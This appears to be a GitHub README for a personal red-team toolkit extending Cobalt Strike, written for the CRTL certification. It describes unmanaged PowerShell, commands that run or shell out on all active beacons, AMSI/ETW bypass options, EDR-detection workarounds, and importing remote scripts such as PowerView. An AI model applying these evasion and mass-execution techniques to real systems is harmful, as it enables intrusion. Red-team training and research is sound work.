Browse by type
Various resources to enhance Cobalt Strike's functionality and its ability to evade antivirus/EDR detection. Includes the custom tooling I used when pursuing the Certified Red Team Lead (CRTL) certification.
Click here for the PowerPoint I presented at ChiCyberCon in 2024 that summarizes my research. I'm open to community suggestions on restructuring or adding content to this PowerPoint. Feel free to submit a GitHub issue regarding this.
For my Red Team Ops I and II cheat sheets, check out my cheat sheets repo.
<protocol>_x64.xprocess.binrun or shell command on all active Cobalt Strike beacons, without having to interact with each one individuallyNote: When building powerpick.cs, you'll have to add a reference to System.Management.Automation.dll, which is located in C:\Program Files (x86)\Reference Assemblies\Microsoft\WindowsPowerShell\<version>
Note: beaconsvc.cpp gets caught by Elastic static detection when compiled, so you might have to modify it. You can also run the standard EXE as a service, and it'll throw an error but still spawn the beacon.
$powerpickPath to specify the path of your unmanaged PowerShell exe (built from powerpick.cs)$etw and $amsi as you see fit - I wanted it to always bypass AMSI and ETW, which is why I set these values to 1, though someone could argue this creates additional telemetry in cases where the AMSI/ETW bypass isn't necessary, and for this reason it's better to leave the default values at 0.x execute-assembly <exe> <args>x powerpick <powershell>powershell-import, but I noticed that using this method of importing scripts generally gets detected by EDR. If you'd like to remove this functionality altogether, comment/remove lines 74-76.--import <script> (eg. x --import https://example.com/PowerView.ps1 powerpick Get-Domain). You can specify a local file on disk or remotely hosted file with http/https. This only supports importing one PowerShell script. I'm too lazy to extend the functionality to support multiple scripts when one per command is usually all you need.Note: I commented out the portions of the script that parse arguments in single (') and double quotes (") as a single argument because most of my tooling handles or requires these quotes. For example, the unmanaged PowerShell implementation powerpick.cs takes arguments passed in, converts them to one string, and runs that string. Treating multiple words as a single argument in PowerShell commands thus requires passing in those quotes as-is. You may run into instances where you do need to parse arguments in quotes as a single argument, much like you would providing quotes when running the .NET executable in a terminal. If this is the case, you are welcome to uncomment the code portions starting on line 87 and reload the script. In case you decide to do this, I modified the conditional (if statement) so it continues to pass quotes in as-is when running powerpick.
run on all active beacons with run_all <exe> <args>shell on all active beacons with shell_all <command>My experience with AV/EDR evasion techniques and Cobalt Strike comes from the following: - Zero-Point Security Red Team Ops II - Maldev Academy - Midwest Regional Collegiate Cyber Defense Competition (I'm a red team volunteer)
I also recommend checking out the Sektor7 Institute courses.
Two additional Beacon Object Files I found very useful that I wanted to give a shoutout to, both by TrustedSec: - Situational Awareness - Remote Operations
I was careful to avoid any copyright infringement with the resources I publicly provided in this repo. Here are two areas where copyright might come into question: 1. I include my modifications to the Cobalt Strike process injection and sleep mask kits from Fortra, which are closed-source. However, I only provided files to which I made modifications, and I replaced all portions of the code that were not my own with a comment stating redacted. Should you choose to use these resources, you'll have to copy my code portions over from this repo to the corresponding files in the kits. 2. In my loader, I included code taken directly from the Zero-Point Security Red Team Ops II course. However, this code is publicly available and easily-obtainable online as well. Telling ChatGPT to "write C++ code using WinHTTP to download a file and save it to an std::vector\<BYTE>" yields almost the exact same code for the Download function, and the NtMapViewOfSection technique is publicly documented in various locations, making use of the same Windows API function calls in the same order. Also keep in mind this repo doesn't come close to being a substitute for the course itself, which in my opinion is absolutely worth taking.
I do this research for fun because this is my passion. If you like what I do and would like me to be part of your offensive team, feel free to reach out to me at johnford.security@proton.me or connect with me on LinkedIn.
$ claude mcp add Cobalt-Strike \
-- python -m otcore.mcp_server <graph>